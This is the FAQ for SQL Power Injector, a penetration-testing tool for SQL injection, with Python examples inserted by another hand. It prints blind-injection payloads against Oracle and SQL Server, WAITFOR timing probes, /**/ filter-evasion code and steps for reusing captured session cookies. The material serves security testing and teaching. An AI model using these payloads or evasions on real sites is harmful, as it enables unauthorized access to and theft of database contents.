
FAQ

+ Installation
+ How do I use it
+ Licensing and Copyright
+ Versioning
+ Plugin

Installation

What requirements do I need to make it run?

This application runs on the .Net Framework 1.1 SP1 or 2.0, so you will need one of these frameworks installed. However, for some reason the application has problems running if you have the .Net Framework 1.1 and 2.0 installed but not 1.1 SP1. So do not be surprised to be asked to install the .Net Framework 1.1 Service Pack 1 even though you have 2.0 installed.

You will also need Internet Explorer 5 or later to make it work.

What are those two dll files: AxInterop.SHDocVw.dll and Interop.SHDocVw.dll?

The application uses a component that is not included in the .Net Framework by default. This component is an ActiveX control that was already present in previous Microsoft development environments (Visual Basic).

In order to work in the .Net environment this ActiveX control needs a proxy to communicate with the Common Language Runtime (CLR). This proxy is created automatically by .Net when the reference to the component is added. At that moment .Net adds two dll files reflecting this reference to the project: one wrapping the COM type library of the control (Interop.SHDocVw.dll) and one hosting it as a Windows Forms control (AxInterop.SHDocVw.dll). That is why both are mandatory for the execution of the application and must be present for it to work.

This ActiveX control is the Microsoft Web Browser Control, used for the browsing part of the application. I found it really convenient, and it had all the functionality and events I needed for the application.

Why is there a file called SQLPowerInjector.exe.config in the application root directory?

This file is necessary if SQL Power Injector is to load web pages whose headers contain errors. As an example, the HTTP/1.1 standard (RFC 2616, section 4) stipulates that an empty line (CRLF) after the header fields marks the end of those fields. In some cases only a CR or an LF is inserted, which causes an error in SQL Power Injector during loading.

In order to load as many pages as possible I had to add a value in that file that tells the framework to ignore this kind of protocol violation.
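As an added example (not code from SQL Power Injector, whose .config file only tells the .Net Framework to tolerate this), here is a small Python parser that accepts the violation described above, a header line or the final empty line terminated by a bare CR or LF, and reports that it did so, so the caller can decide whether a non-compliant response is still worth trusting. Both sample responses in it are constructed for the example.

```python
"""Lenient parser for an HTTP response head (added example; not SQL Power Injector code).

RFC 2616 section 4 ends every header line, and the header block itself, with CRLF.
Some servers send a bare CR or LF instead. This parser accepts CRLF, LF or CR and
records each deviation instead of failing the whole response.
"""
import re
from typing import Dict, List, Tuple

# RFC 2616 requires CRLF; a strict parser would use rb"\r\n" alone.
_LINE_END = re.compile(rb"\r\n|\n|\r")

# Constructed sample responses: a compliant one and one with bare LF terminators.
STRICT_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 6\r\n"
    b"\r\n"
    b"<html>"
)
SLOPPY_RESPONSE = (
    b"HTTP/1.1 500 Internal Server Error\n"
    b"Content-Type: text/html\n"
    b"\n"
    b"<html>Microsoft OLE DB Provider for SQL Server error '80040e14'</html>"
)


def parse_response_head(raw: bytes) -> Tuple[int, Dict[str, str], bytes, List[str]]:
    """Split a raw response into (status, headers, body, violations).

    Header names are lower-cased. `violations` lists each deviation from RFC 2616
    that a strict parser would have turned into a hard failure; an empty list
    means the head was fully compliant.
    """
    lines: List[bytes] = []
    terminators: List[bytes] = []
    body_start = None
    pos = 0
    for m in _LINE_END.finditer(raw):
        line = raw[pos:m.start()]
        pos = m.end()
        terminators.append(m.group(0))
        if line == b"":                     # the empty line closing the header fields
            body_start = pos
            break
        lines.append(line)
    if body_start is None or not lines:
        raise ValueError("no status line or no empty line terminating the header fields")

    violations: List[str] = []
    bare = sum(1 for t in terminators if t != b"\r\n")
    if bare:
        violations.append("%d line terminator(s) are a bare CR or LF instead of CRLF" % bare)

    match = re.match(r"HTTP/\d\.\d (\d{3})", lines[0].decode("latin-1"))
    if match is None:
        raise ValueError("malformed status line: %r" % lines[0])

    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            violations.append("malformed header line %r" % line)
            continue
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return int(match.group(1)), headers, raw[body_start:], violations


if __name__ == "__main__":
    for raw in (STRICT_RESPONSE, SLOPPY_RESPONSE):
        status, headers, body, violations = parse_response_head(raw)
        print(status, headers, body[:20], violations)
```

The point of returning the violations rather than silently accepting the response is that a server which cannot even terminate its headers correctly is often an error page, a proxy or a filter rather than the application you think you are talking to; a tester wants to see that rather than have it hidden.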

This application runs in a framework owned by Microsoft and I have a UNIX or Linux or Macintosh operating system, is there any way that it could work on my operating system?

There are at least two well-known applications that make it possible to develop and run .Net projects on those systems.

Here is the list of the two applications with their web site:

All the necessary information related to installation can be found on their respective web sites.

You can also read this article for further information on how to make it work on Linux: http://www.builderau.com.au/program/0,39024614,39130565,00.htm

I have problems with the installation, is there any hotline or any contact I can reach to help me out?

No hotline is available since it's a free product, but I will gladly try to help anyone who has a problem, within a reasonable delay, if you email me at support (at) sqlpowerinjector.com

Will the Plugin be installed automatically with the installation executable?

No. You will need to install it separately in one of the following ways:

If you use Firefox:

If you use Internet Explorer:


How do I use it

When I click on the Load button I get this message "No FORM tag with the POST option checked". Why?

No form tag was found in the page you loaded. This could mean many things; here are at least two possible reasons:

  1. The URL you loaded was copy-pasted from a web site that contains one or several frames. Those frames might contain the parameters you want to load; if so, you will have to find the URL of those frames specifically.

    HINT: right-click on the web page close to the place you think contains the parameters you want, then click Properties and copy-paste the URL.

  2. By default the web page is loaded with the POST method. Perhaps you wanted to load it with GET. Just choose it and try again.

What is the Normal mode?

The normal mode is basically what anyone would do first when trying to SQL inject: it takes the value(s) in the Datagrid and sends them to the web server as is.

What is the Blind mode?

This mode can be used when there is no way to display the injected information in the returned web page; that's why it is called blind SQL injection. You can use it in two ways:

In either case the application will send requests to the server and, by dichotomy, compare the true or false expected response, or the time delay, until it finds the requested value.

HINT: Try to find the SQL command to inject in normal mode first, and use blind mode only if there is no other choice.

Why are there three text insertion values in the parameter grid?

These three text insertion values are the core of what makes the application special.

Depending on the mode you are in, the application uses only one or all three text insertion values. In normal mode you only need the first, called "Starting string". In this case all your inputs are sent exactly as they are, with no modification or added strings.

On the other hand, if you use blind mode you have to choose one parameter that you can SQL inject and use the three strings (you choose one by checking the parameter on the left). In this case, according to the type of information you want to get (Word, Length or Count), the application adds some strings after the starting string (hence its name) and before the varying string, and finally after the varying string and before the ending string (hence its name as well).

For example, to get the IP address of the server hosting an Oracle DB:

Options:

SMITH' AND 30 < (SELECT ASCII(SUBSTR(CAST(SYS_CONTEXT('USERENV', 'IPADDRESS') AS VARCHAR(4000)), 1, 1)) FROM DUAL)--

Legend:

           Blue: Starting string
           Red and italic: Automatically added strings
           Purple and bold: Varying string
           Green: Ending string

As you can see, many strings are added automatically and some parts will change until the full IP address value of the example above is obtained.

Here is another example to make sure this is well understood:

Let's say we want the length of the name of the first database on the attacked SQL Server:

Options:

white' AND 30 < (SELECT LEN(name) FROM master..sysdatabases where dbid=1)--

Legend:

           Blue: Starting string
           Red and italic: Automatically added strings
           Purple and bold: Varying string
           Green: Ending string

And if you want the full name, you just need to change the type to Word. Moreover, if you want the name of the second database you need to change the value of dbid to 2 and click Start. As you can see, once the syntax is found, the rest is just a matter of changing some values.

Subsequently you can construct the SQL string to inject with the specific commands you want, and in blind mode the application fills in the repetitive information for you.

Over time, while building my SQL strings to inject, I discovered that the syntax could be broken into three main portions. And while some values can change, as you have seen in the example, the part everything revolves around is the varying string.

What exactly is the varying string?

It is the data that you want to obtain once the SQL injection is made. It is only available in blind mode.

Read the question "Why are there three text insertion values in the parameter grid?" for more details.

What does the weird result message exactly mean?

There is some kind of error on the server. Here is a non-exhaustive list of what could cause this:

What is the use of the check box Error?

When someone tries to find a possible SQL injection vulnerability in a web page, it is useful to look inside the page response for any hint of success. In order to point out any place where that error could be, I added an option that searches for any occurrence of the word "error" in the source of the page.

It can be useful when someone wants the specific information of the error without all the rest of the source code. Its sole purpose is to add some clarity and show the real error message at first glance. However, the amount of text you get after the word Error depends on the value entered in "HTML Message Length". If there is not enough information, just raise that value and click Start again, until you are satisfied.

Why didn't I make it automatic? The reason is simple: sometimes the word Error appears in the source without meaning an actual SQL injection error, for example in JavaScript code that handles a variable with error in its name.

As an additional note, the application automatically detects and displays only the common ODBC errors, since that is what we are looking for. The list is currently hard coded, but I intend to move it to an editable file in a subsequent version, so that database errors I didn't think of can be added.

What is the use of the "Replace space by /**/"?

Sometimes a web site has an IDS or some kind of string filtering mechanism that tries to catch commonly used T-SQL or PL/SQL keywords. One way to bypass such filters is simply to replace spaces by /**/, so this option does it automatically for you.

I suggest trying it if you don't get any positive results with your SQL injection; you might be lucky.
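As an added example, not code from SQL Power Injector, here is the substitution in Python together with a toy keyword filter that it defeats. The filter signatures, the function names and the sample payloads are mine. The one refinement over the option described above is that spaces inside string literals are left alone, since /**/ inside a literal changes the value being compared rather than just the syntax.

```python
"""Space-to-comment substitution against keyword filters (added example; not
SQL Power Injector code).

A signature-based filter typically matches keywords separated by whitespace
("UNION SELECT", "OR 1=1"). SQL Server, Oracle and MySQL all accept the empty
comment /**/ wherever whitespace is allowed, so rewriting the spaces keeps the
statement valid while the signature no longer matches.
"""
import re

# Constructed signatures in the style of a naive keyword filter (not a real product's rules).
SIGNATURES = [
    re.compile(r"\bunion\s+select\b", re.IGNORECASE),
    re.compile(r"\bor\s+\d+\s*=\s*\d+", re.IGNORECASE),
    re.compile(r"\bwaitfor\s+delay\b", re.IGNORECASE),
]


def naive_filter_blocks(payload: str) -> bool:
    """True when the toy filter would reject the payload."""
    return any(sig.search(payload) for sig in SIGNATURES)


def spaces_to_comments(payload: str, inside_literal: bool = True) -> str:
    """Replace every space outside string literals with /**/.

    An injected value is normally placed inside the application's own quoted
    literal, so by default the payload starts *inside* a literal and its first
    quote closes it; pass inside_literal=False for a numeric context.
    """
    out = []
    for ch in payload:
        if ch == "'":
            inside_literal = not inside_literal   # a doubled '' toggles twice: no net change
        if ch == " " and not inside_literal:
            out.append("/**/")
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    payload = "SMITH' AND name LIKE 'a b%' OR 1=1--"     # constructed payload
    rewritten = spaces_to_comments(payload)
    print(rewritten)
    print("blocked before:", naive_filter_blocks(payload), "after:", naive_filter_blocks(rewritten))
```

Note that the literal 'a b%' keeps its space in the output; a blind replace would have turned it into 'a/**/b%' and the LIKE pattern would no longer match what the tester intended.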

I know that I can inject time delay but when I type WAITFOR DELAY '0:0:5', I get a result after about two/three/four/… times later than my value set in the delay. What's wrong?

It's a good sign, because now you know that the WAITFOR delay works. However, it means that the injected parameter is used several times in the query built dynamically on the server side.

So if the query uses the parameter three times and you used a time delay of 4 seconds, you will get a response after approximately 13 seconds (3 × 4 seconds, plus about 1 second to execute the server-side code of the page). The good news is that nothing is lost: instead of setting your Delay in seconds parameter to 4, set it to 12 and voila!

The response displayed of my SQL injection has been cut in a place that I don't get any real SQL injection error, why?

This happens when "Trap Error String" is checked and the word "error" occurs in the response source in a place that is not a real error, for example in a JavaScript function where a variable has the word error in its name.

Read the question "What is the use of the check box Error?" for more details.

The response displayed of my SQL injection has been cut and I cannot read the rest of the message, what happened?

It could be any of these three reasons:

Why don't I see any pictures in the response window?

The goal of this application is to help find SQL injections in a web page and exploit them. So I decided to use the Microsoft Web Browser Control ActiveX to display only what is necessary and avoid the distractions that images could bring. I never intended it to be a real browser.

However, I'm fully aware that on some rare occasions the hint of success of the SQL injection could be in a picture (an error or an exclamation point in an image, for example). So I might add this functionality in a subsequent version if a lot of people ask for it. In any case, the picture's name might contain the word error and be detected with the option "Trap Error String".

I lose the injected values in the grid results when I select a line, why?

All the spaces are replaced by a + sign in order to be understood by the web server. Consequently, the Datagrid considers the value one huge word, so if that word goes beyond the visible width of the line, only the words before it are displayed when you select it ("Is True - ", for example).

You just need to click inside the line you want to read and scroll right with the arrow key until the end.

It's great that the application automatically adds some SQL code but is it possible to see exactly what the SQL injection string would be like before sending it?

You only need to hover the mouse over the row of the parameter you want to send; after a second or two a tooltip with the SQL injection string is displayed.

Take note that if you have just modified a value in the parameter strings and the focus is still in the textbox, you won't see the change. Click anywhere else in the form, then hover over the row again for a few seconds to see the change.

I have problems to use it, is there any hotline or any contact I can reach to help me out?

No hotline is available since it's a free product, but I will gladly try to help anyone who has a problem, within a reasonable delay, if you email me at support (at) sqlpowerinjector.com

I know I can SQL inject but only after I'm logged in the web application, what can I do?

I would assume that if you went this far it's because you already have a valid login and password. Knowing this, here are two methods you can use:

Easiest way:

  1. If you haven't installed the SQL Power Injector Plugin in Firefox, do so
  2. Log in to the application and go to the vulnerable page
  3. Use the Plugin to launch SQL Power Injector with the whole session context and voila! You are all set to start your tests.

Hardest or old way:

  1. Copy-paste the URL of the page you know you can SQL inject into the URL parameter textbox, then click Load
  2. At that point, depending on the web site, you should get a message stating that there is an error because there is no session, or access denied. It's fine, don't worry.
  3. Now, with a normal browser, go to the web site and log in. Normally the web site will create a session with a session token either in a cookie or inserted in the URL
  4. a) If it's in the URL, it's pretty easy: just go to the page you can SQL inject, copy the URL with the valid session, paste it in the URL parameter textbox and click Load. Now it should work
    b) If it's in a cookie you need to get it either from the browser preferences (Mozilla, Netscape and the like) or with a proxy application such as Paros (http://www.parosproxy.org/index.shtml) or webscarab (http://www.owasp.org/software/webscarab.html), to name a few. I personally recommend using a proxy application because with the browsers you won't get the cookie information in the right format, that is to say:
    MySessionID=AGDAFHAD3142324.
    Once you have found it, just copy it.
  5. Go back to SQL Power Injector (it was opened in step 1; if you skipped that part, do step 1 before going on), open the Insert menu and click Cookie.
  6. An input box is displayed; just paste the cookie value there and click OK. The format should look like this for a JSP session:
    JSESSIONID=D23TfhU3fdf7884HDSA45hfdGs
  7. Now click Start again and you should see the page as when you are logged in. It means it's ready to SQL inject.

What exactly is the SQL positive injection result?

Like the "Trap Error String" option, it makes the application search the returned web page source for an occurrence of the word entered in that textbox. It displays the text from that string up to the length entered in "HTML Message Length".

It can be useful once you have discovered the key word that shows there is a SQL injection problem, or to quickly find a piece of information in the returned web page source.

Read the question "What is the use of the check box Error?" for more details.
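As an added example, not code from SQL Power Injector, here is the search behind both the "Trap Error String" check box and the "SQL positive injection result" textbox in Python, run over a constructed classic ASP error page that also contains the JavaScript false positive described above. The list of ODBC/OLE DB prefixes used to tell a genuine database error from that noise is a short list of well-known message prefixes chosen by me, not the tool's hard coded list.

```python
"""Marker search in a page response (added example; not SQL Power Injector code).

trap_string() reports every case-insensitive occurrence of a marker with the
text that follows it, cut at the configured "HTML Message Length".
database_errors() keeps only the "error" hits that sit right after a known
ODBC/OLE DB error prefix, which is what separates a real database error from
a JavaScript variable that happens to be called errorCount.
"""
import re
from typing import List, Tuple

# Well-known prefixes of Microsoft data-access error messages (my selection).
ODBC_ERROR_PREFIXES = (
    "Microsoft OLE DB Provider for SQL Server",
    "Microsoft OLE DB Provider for ODBC Drivers",
    "[Microsoft][ODBC SQL Server Driver]",
    "[Microsoft][ODBC Microsoft Access Driver]",
)

# Constructed response: a classic ASP page whose script mentions "error" three
# times, followed by a genuine OLE DB error caused by an injected quote.
SAMPLE_PAGE = """<html><head><script type="text/javascript">
var errorCount = 0;
function onError(e) { errorCount++; }
</script></head><body>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font>
<font face="Arial" size=2>error '80040e14'</font>
<p><font face="Arial" size=2>Unclosed quotation mark before the character string 'SMITH''.</font>
<p><font face="Arial" size=2>/search.asp</font><font face="Arial" size=2>, line 12</font>
</body></html>"""


def trap_string(html: str, marker: str, message_length: int) -> List[Tuple[int, str]]:
    """Every (offset, snippet) where marker occurs; each snippet is at most message_length long."""
    return [(m.start(), html[m.start():m.start() + message_length])
            for m in re.finditer(re.escape(marker), html, re.IGNORECASE)]


def database_errors(html: str, message_length: int, context: int = 200) -> List[Tuple[int, str]]:
    """Keep only the "error" hits preceded, within `context` characters, by a known prefix."""
    hits = []
    for offset, snippet in trap_string(html, "error", message_length):
        before = html[max(0, offset - context):offset]
        if any(prefix in before for prefix in ODBC_ERROR_PREFIXES):
            hits.append((offset, snippet))
    return hits


if __name__ == "__main__":
    for offset, snippet in trap_string(SAMPLE_PAGE, "error", 60):
        print("raw hit at %d: %r" % (offset, snippet))
    for offset, snippet in database_errors(SAMPLE_PAGE, 60):
        print("database error at %d: %r" % (offset, snippet))
    print(trap_string(SAMPLE_PAGE, "Unclosed quotation", 30))
```

Run as is, the raw search returns four hits (errorCount, onError, errorCount++ and the real OLE DB error) while the prefix check keeps only the last one, which is exactly the difference between the manual check box and the automatic ODBC detection the FAQ describes.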

What is the use to inject a cookie?

For many reasons:

Where can I find the right cookie information to inject?

Either in the browser preferences, if you use Mozilla-based browsers, or with the help of a proxy such as Paros (http://www.parosproxy.org/index.shtml) or webscarab (http://www.owasp.org/software/webscarab.html), to name a few.

I personally recommend using a proxy because with the browsers you won't get the cookie information in the right format, that is to say:

MySessionID=AGDAFHAD3142324

How can I get the maximum or minimum value of a column?

In the varying string you need to use the SQL function MAX or MIN with your column between parentheses.

Example:

          MAX(OBJ#) for maximum of an Oracle object ID,
          MIN(OBJ#) for minimum of an Oracle object ID

          Useful when you want to get all the tables from an Oracle database...

Why do I get a different display when I change from the normal to blind mode?

Because some options are only available in normal mode and not in blind mode, and vice versa. I believe it's much clearer to display only what is relevant to the current mode.

Why does the number of thread stop at 50?

I decided to stop at 50 for no particular reason; it could have been 10 or 100. However, just know that if you go beyond a certain point you will either saturate the line or run out of CPU power. The statistics on the web site show that the highest value is not always the best.

But if you think you can go beyond that, I encourage you to modify the code and raise it to the number you want. The modification is not hard to make since it's a constant value.

However, in my experience, beyond 8 threads you start to get many errors (sun characters) and things slow down significantly.

Why can I change the number of the starting length and starting count?

It's only a question of optimization. In blind injection the current character is determined by dichotomy. Dichotomy, according to Merriam-Webster, is a division or the process of dividing into two especially mutually exclusive or contradictory groups or entities.

Let's say we have a starting length of 1000000 and your data has a length of 6; the application will need to send these values to the server before getting close to the real number:

1000000,
500000,
250000,
125000,
62500,
31250,
15625,
7812,
3906,
1953,
976,
488,
244,
122,
61,
30,
15,
7,
3,
5,
6

21 calls to the server. But if you use something more reasonable, such as 30:

30,
15,
7,
3,
5,
6

6 calls to the server: much faster.

So now with this understood you can optimize the starting length or count in this fashion.

What is the point to have the method type and color specified in the detected Submit URL?

In order to load the fields contained in a web page, SQL Power Injector needs to know where you want to get them from, that is to say from the URL string or from inside the form. Until now you had no way to know which method you needed to request the page with, so you would end up clicking Start and getting a page that made no sense or showed no visible result.

Now with that option it's possible to set GET or POST according to the method detected for that specific form, and thus get the result the web application expects. However, it can always be interesting to see how the application reacts if you don't use the expected method.

The color code is just an ergonomic improvement for readability.

I loaded a session that I previously saved and it's no more working, what's wrong?

It could be caused by three things.

The first possibility is that, since you saved the session, fields or values on the web page have changed, so that the web application now behaves differently. To make sure they are still the same, just reload the page and see if it's different.

The second possibility is that you or someone else modified the session XML file and it no longer matches the web page.

The last possibility is that the web page needs an authentication cookie and it's no longer valid. You need to capture the cookie again and reinsert it, as explained in the question "I know I can SQL inject but only after I'm logged in the web application, what can I do?"

Why when I add a new string parameter I get a new cookie parameter or vice-versa?

It might be because the wrong type of parameter was selected when you clicked the Add button.

There are two ways to see whether you have the right type of parameter selected:

Why can I use TOP with only SQL Server and not the other DBMS?

Because only SQL Server supports that feature reliably (Sybase/AES seems to behave weirdly, so I removed it). Surely there are equivalents in the other DBMS, but it would have required much more effort than I could allow at this moment. Perhaps in subsequent versions...

When I look at the page source the color does not appear or it does after some time, why?

Eventually it will appear. It's because the application is processing the HTML tags and text inside the page source; the bigger and more complex the page, the longer it takes. I might make some optimizations in a subsequent version.

Why are there two MySQL database type in the list?

Because MySQL before version 4.1.1 uses a different SQL syntax for blind SQL injection. Indeed, MySQL 4.1.0 and under does not support CAST and SUBSTR, only SUBSTRING does, and SUBSTRING has appeared with version 4.1.1. Also, it's not possible to use CAST with CHAR until version 4.1.1.

Consequently, two MySQL database types have been added to the list.

What is the use of the character preset feature?

A huge gain of time and far fewer requests to the web server, provided you know how to use it efficiently.

With the dichotomy technique, in order to find the ASCII code of a character you need to search through all 256 values of the extended ASCII table. That requires 8 requests to the web server per character. Knowing this, let's say you have a sentence of 100 characters: that makes about 800 requests. If we consider that on average the round trip takes half a second, it would take 400 seconds, that is 6 minutes and 40 seconds. Quite some time, isn't it?

So I asked myself, how can I optimize it? It came to me that most of the time the strings I was trying to get were predictable in the kind of characters they contained. That is to say, I knew beforehand that in some cases a string would contain only alphabetic characters and spaces. So why use the full set of 256 characters when in fact I only needed to search among 53? Even better, if I can make it uppercase on the SQL side, why would I need the 52 alphabetic characters (26 lower case and 26 upper case)? Now I can go down to only 27 characters. And if you really want to optimize further, you could remove Z and some other characters that are rarely used in a word.

At that point you lower the number of requests per character by 3, or 4 in some cases. So let's say we lower it by only 3 and use our word of 100 characters: it would then require 500 requests, and with a half-second round trip it would take 250 seconds, that is 4 minutes and 10 seconds. So you saved 2 minutes and 30 seconds! Imagine now that you need to get 50 values, how much time you'll gain...

Note: In order to use the UPPERCASE optimization you need to check the Case Insensitive checkbox and select only upper case characters in the chosen character preset.
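As an added example (not code from SQL Power Injector), here is the dichotomy from the questions "Why can I change the number of the starting length and starting count?" and "What is the use of the character preset feature?" in Python, run against a simulated oracle instead of a web server. It reproduces the 21 and 6 requests of the starting length example, the 8 requests per character of the full 256-value set against at most 5 for the 27-character uppercase preset, and shows how a character outside the preset ends up as the sun character. The oracle, the secrets and the doubling fallback when the value exceeds the starting length are my own assumptions; the FAQ does not say what the tool does in that last case.

```python
"""Blind SQL injection by dichotomy (added example; not SQL Power Injector code).

The oracles below stand in for the web server: each call counts as one request
and answers the injected condition "probe < (SELECT ...)" against a secret that
is constructed here.
"""
import string
from typing import Callable, List


class Requests:
    """Counts simulated requests to the web server."""
    def __init__(self) -> None:
        self.sent = 0


def length_oracle(secret: str, counter: Requests) -> Callable[[int], bool]:
    """Simulates `... AND probe < (SELECT LEN(secret))` for a Length/Count query."""
    def ask(probe: int) -> bool:
        counter.sent += 1
        return probe < len(secret)
    return ask


def char_oracle(secret: str, counter: Requests, case_insensitive: bool) -> Callable[[int, int], bool]:
    """Simulates `... AND probe < ASCII(SUBSTRING(UPPER(secret), position, 1))` for a Word query."""
    text = secret.upper() if case_insensitive else secret

    def ask(position: int, probe: int) -> bool:
        counter.sent += 1
        return probe < ord(text[position])
    return ask


def find_length(ask: Callable[[int], bool], start: int) -> int:
    """Halve from `start` while the condition is false, then bisect the remaining gap."""
    probe, upper = start, None                # upper: smallest probe known to satisfy length <= probe
    while not ask(probe):
        if probe == 0:
            return 0
        upper, probe = probe, probe // 2
    lower = probe                             # length > lower
    if upper is None:                         # secret longer than the starting length (my fallback)
        upper = max(1, 2 * lower)
        while ask(upper):
            lower, upper = upper, 2 * upper
    while upper - lower > 1:
        mid = (lower + upper) // 2
        if ask(mid):
            lower = mid
        else:
            upper = mid
    return upper


FULL_8BIT = list(range(256))                                              # the default set
UPPER_AND_SPACE = [ord(" ")] + [ord(c) for c in string.ascii_uppercase]   # the 27-character preset


def find_word(length: int, ask: Callable[[int, int], bool], preset: List[int], verify: bool = False) -> str:
    """Bisect each character over the ascending ASCII codes of the preset.

    With verify=True, up to two extra requests confirm the code is exactly the one
    found; a character that is not in the preset then shows up as the sun character.
    """
    out = []
    for pos in range(length):
        lo, hi = 0, len(preset)               # answer index lies in [lo, hi)
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if ask(pos, preset[mid] - 1):     # code > preset[mid]-1  <=>  code >= preset[mid]
                lo = mid
            else:
                hi = mid
        code = preset[lo]
        if verify and not (ask(pos, code - 1) and not ask(pos, code)):
            out.append("¤")
        else:
            out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    for start in (1000000, 30):
        c = Requests()
        print("start %d -> length %d in %d requests" % (start, find_length(length_oracle("master", c), start), c.sent))
    c = Requests()
    print(find_word(4, char_oracle("DB_1", c, True), UPPER_AND_SPACE, verify=True), c.sent)
```

The verify step is what a tester would want when the result contains sun characters: two more requests per character tell apart "the preset does not contain this character" from "the server answered inconsistently", at the cost of the request savings the preset was bought for, so it is worth switching on only for the characters that came back as ¤.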

I saved a session with Sybase and it’s now displaying MySQL 4.1.1 when I load it, why?

Since I divided the MySQL database type in two, the index of every entry after "MySQL 4.1.0 and under" in the database type drop down list has been increased by 1. Since only Sybase/AES came after MySQL in the list, only that DBMS was impacted: its index was 4 and is now 5, because "MySQL 4.1.1 and above" is now 4. Consequently, when you load a session saved with Sybase/AES it now displays "MySQL 4.1.1 and above".

I'm really sorry about that and hope it doesn't impact you too much. The good news is that Sybase is not as widely used as the other DBMS, which is how I mitigated the risk.

In order to fix the problem, just load each session in which you used Sybase, change it back in the drop down list and resave it over the old file.

Why do I get the sun character(s) ¤ inside in the resulting Word string?

It's because the application wasn't able to resolve that character. So instead of staying on that character forever, a new mechanism transforms it into the sun character.

The right question is: why is the application not able to resolve that particular character? It can be due to many reasons.

Here are some:

Licensing and Copyright

What is the limitation of use?

There is no limitation of use as long as you respect the Clarified Artistic License that applies to the product.

May I use it to do professional security assessment for free?

Of course, and I encourage you to do so.

May I reuse the code for my own security application that will be sold?

You again have to respect the Clarified Artistic License on this point. Here are the two main points (3 and 4) of the license regarding it:

  3. You may otherwise modify your copy of this Package in any way, provided that you insert a prominent notice in each changed file stating how and when you changed that file, and provided that you do at least ONE of the following:
    a) place your modifications in the Public Domain or otherwise make them Freely Available, such as by posting said modifications to Usenet or an equivalent medium, or placing the modifications on a major network archive site allowing unrestricted access to them, or by allowing the Copyright Holder to include your modifications in the Standard Version of the Package.
    b) use the modified Package only within your corporation or organization.
    c) rename any non-standard executables so the names do not conflict with standard executables, which must also be provided, and provide a separate manual page for each non-standard executable that clearly documents how it differs from the Standard Version.
    d) make other distribution arrangements with the Copyright Holder.
    e) permit and encourage anyone who receives a copy of the modified Package permission to make your modifications Freely Available in some specific way.
  4. You may distribute the programs of this Package in object code or executable form, provided that you do at least ONE of the following:
    a) distribute a Standard Version of the executables and library files, together with instructions (in the manual page or equivalent) on where to get the Standard Version.
    b) accompany the distribution with the machine-readable source of the Package with your modifications.
    c) give non-standard executables non-standard names, and clearly document the differences in manual pages (or equivalent), together with instructions on where to get the Standard Version.
    d) make other distribution arrangements with the Copyright Holder.
    e) offer the machine-readable source of the Package, with your modifications, by mail order.

Versioning

Will we expect any more versions in the future?

Not likely. I agreed with my employer that I would finish this version and stop creating major versions, in order to avoid any conflict of interest since I work in the same field. In any case I don't mind it that much, since it takes a lot of time away from other things that are dear to me: my beloved wife, future family, Taekwon-do and violin.

Unless someone else starts helping me with the project, it is pretty much set for now. The good news, however, is that I will fix any bugs that are found, answer your emails and probably add some minor functionality.

Will the application remain free?

What I can promise is that the main functionality will remain free. One day I might sell it with added features that companies require, such as reporting, or if intensive or professional support is demanded.

Those are things that require more time and professional follow-up than I can handle alone, so I might need to hire some people to help me out. Again, it will entirely depend on the popularity of the application.

But worry not, all the powerful features will be there free of charge. And I will help anyone asking questions about the application or requiring help as much as I can. Just be patient with me because I'm alone on this project.

Is there any list of future features available somewhere?

Not officially, but as you can see if you read the whole FAQ, sometimes I let some ideas for features slip into the text.

I have great ideas to improve the application. How can I help?

I will be delighted to hear about it! The hardest part has been done, finding the path; now it's time to make this path more secure, solid and better.

However, if you want to submit code I'm open to this as well, since it's open source, but remember that I'm acting as project and quality manager and might modify some code to keep it coherent with the rest. Don't worry, the general algorithm will be kept; I might just modify the indentation and variable naming and add some comments where necessary. It's my square side, I guess, but I think it's an important side to have in the software industry.

You can reach me at improvement (at) sqlpowerinjector.com to communicate all your ideas.

I have found bugs in the application, where do I communicate them?

You can send them to bugs (at) sqlpowerinjector.com. It will help me a lot and I'll appreciate it very much. Even if it's never pleasant to have bad criticism or bugs found in your work, I personally think it's just a good opportunity to make things better.

Please give as many details as you can about the bug and, if applicable, a screenshot as well.

Plugin

What is the main purpose of this Plugin?

Simply put, to make your life much easier.

It will automatically get all the relevant parameters from the current web page, launch SQL Power Injector and load them for you. More importantly, it will also load all the cookies associated with the current session, that is to say all session cookies.

There were two annoying things I found with the previous version of SQL Power Injector.

The first was having to systematically load each page I suspected of containing a SQL injection and then test it, when in reality it was much easier to make quick tests inside the browser itself while navigating the web site. The true power of SQL Power Injector is to help you find hard-to-find SQL injections, not those where you only need to add a quote to the parameter. So let's say you suspect there is a SQL injection in a page but can't find it easily: you just use the Plugin and voila, your true tests start. Much faster that way.

The second, and by far the most annoying, is that if I needed cookies to keep the session, after logging in for instance, I had to get their values and add them manually in the application. Now, whenever you wish, before or after you log in, you just use the Plugin and the whole session context associated with the cookies is passed for you.

Why is there only a Plugin for Firefox and not any for Internet Explorer?

For two reasons.

The first is that it's much easier and faster to create one for Firefox.

The second is lack of time.

Besides, I figured out that most SQL Power Injector users use Firefox anyway. And since I created the application with Microsoft technology, I thought it was only fair to use something else.

Why when I use the Plugin I get only the value from POST and not from GET or vice-versa?

Because you need to change it in the Options of the Plugin.

I know it's not practical, but I'm going to make it better in the next version of the Plugin. Again, the evil lack of time has struck...

Where do you change the default load method?

Go to the Tools menu, then Add-ons. There, find the SQL Power Injector Plugin and click Options. From there you can change the default behavior.

Copyright © 2006-2014 Francois Larouche